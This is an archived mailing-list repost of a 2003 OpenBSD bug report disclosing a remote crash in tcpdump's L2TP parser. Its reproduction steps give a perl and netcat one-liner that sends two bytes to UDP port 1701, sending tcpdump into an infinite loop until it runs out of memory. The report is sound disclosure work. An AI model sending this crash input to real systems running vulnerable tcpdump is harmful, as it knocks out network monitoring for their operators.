<<< Date Index >>>     <<< Thread Index >>>

Remote crash in tcpdump from OpenBSD



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



- -------- Original Message --------
Subject: user/3610: repetable tcpdump remote crash
Resent-Date: Sat, 20 Dec 2003 08:55:02 -0700 (MST)
Resent-From: gnats@xxxxxxxxxxxxxxx (GNATS Filer)
Resent-To: bugs@xxxxxxxxxxxxxxx
Date: Sat, 20 Dec 2003 16:42:25 +0100 (CET)
From: venglin@xxxxxxxxxxxxxxxxx
Reply-To: venglin@xxxxxxxxxxxxxxxxx
To: gnats@xxxxxxxxxxx

>Number:         3610
>Category:       user
>Synopsis:       repetable tcpdump remote crash
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Sat Dec 20 15:50:02 GMT 2003
>Closed-Date:
>Last-Modified:
>Originator:     Przemyslaw Frasunek
>Release:        3.3-RELEASE
>Organization:
net
>Environment:
        System      : OpenBSD 3.3
        Architecture: OpenBSD.i386
        Machine     : i386
>Description:
        Sending a packet containg 0xff,0x02 bytes to port 1701/udp causes
        a L2TP protocol parser in tcpdump to enter an infinite loop, eating
        all available memory and then segfaulting.

        This bug also affects tcpdump in -CURRENT.
>How-To-Repeat:
        tcpdump -i lo0 -n udp and dst port 1701 &
        perl -e 'print "\xff\x02"' | nc -u localhost 1701
>Fix:
        Unknown, recent versions of tcpdump are immune to this problem.


>Release-Note:
>Audit-Trail:
>Unformatted:


- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@xxxxxxxxxxxxxxx ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE/5HfykxEnBiV4/K0RApAkAKDMw3qheVAkGu3v2EvoCoq07C8ZYgCgh9sl
ZjwiNzK9di8oSMQ1XK/YF+g=
=Q0AT
-----END PGP SIGNATURE-----